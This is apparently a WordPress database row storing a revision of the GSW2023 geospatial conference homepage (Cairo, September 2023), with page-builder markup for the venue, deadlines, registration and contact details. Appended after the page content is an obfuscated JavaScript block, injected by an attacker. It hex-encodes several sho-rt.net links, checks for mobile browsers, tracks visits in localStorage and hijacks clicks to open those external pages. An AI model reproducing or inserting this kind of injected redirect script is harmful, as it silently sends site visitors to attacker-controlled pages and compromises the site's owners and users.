spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"]\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:18:43','2023-05-17 05:18:43','',3066,'https://gsw2023.com/?p=4525',0,'revision','',0),
